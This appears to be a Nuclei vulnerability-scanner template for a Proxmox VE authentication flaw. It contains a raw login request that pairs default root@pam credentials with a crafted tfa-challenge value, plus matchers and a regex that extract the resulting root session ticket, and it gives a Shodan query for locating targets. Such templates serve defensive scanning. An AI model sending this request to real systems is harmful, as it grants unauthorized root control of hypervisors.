id: CVE-2023-54391 info: name: Proxmox VE - Default Credentials with TFA Bypass author: DhiyaneshDk,0x_Akoko severity: critical description: | Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface. impact: | Unauthenticated attackers can bypass authentication and gain unauthorized access, including root privileges. remediation: | Update to version 8.0.4 or later. metadata: verified: true max-request: 1 shodan-query: title:"Proxmox" tags: cve,cve2023,proxmox,auth-bypass,vuln,vkev http: - raw: - | POST /api2/json/access/ticket HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: application/json username=root%40pam&password=root%40pam&tfa-challenge=NEBUSEC-CHALLENGE matchers-condition: and matchers: - type: word part: body words: - '"data"' - '"ticket"' condition: and - type: word part: header words: - application/json - type: status status: - 200 extractors: - type: regex name: ticket part: body regex: - '"ticket"\s*:\s*"([^"]+)"' group: 1 # digest: 4b0a00483046022100eede67d51e4d585bc9704d3f1db211f3a9f652fad913bf3c61f4fe387f3321c6022100a3d7d1aaffd38814578a8eb0b559e84bcd6bbfefb28a079bc555984b56b3830a:922c64590222798bb761d5b6d8e72950